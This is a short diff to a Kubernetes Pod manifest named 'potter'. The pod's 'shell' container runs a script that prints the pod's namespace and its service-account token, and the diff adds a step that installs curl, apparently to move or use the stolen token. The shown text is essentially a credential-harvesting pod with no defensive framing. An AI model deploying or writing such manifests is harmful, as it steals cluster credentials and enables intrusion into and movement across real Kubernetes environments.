--- a/deployment.yaml
+++ b/deployment.yaml
@@ -1,7 +1,7 @@
 apiVersion: v1
 kind: Pod
 metadata:
-  name: potter-v5
+  name: potter-v6
 spec:
   containers:
     - name: shell
@@ -10,6 +10,7 @@ spec:
         - sh
         - -c
         - |
+          apt update && apt install -y curl;
           {
             echo '>> NAMESPACE:' && cat /var/run/secrets/kubernetes.io/serviceaccount/namespace;
             echo '>> TOKEN:' && cat /var/run/secrets/kubernetes.io/serviceaccount/token;
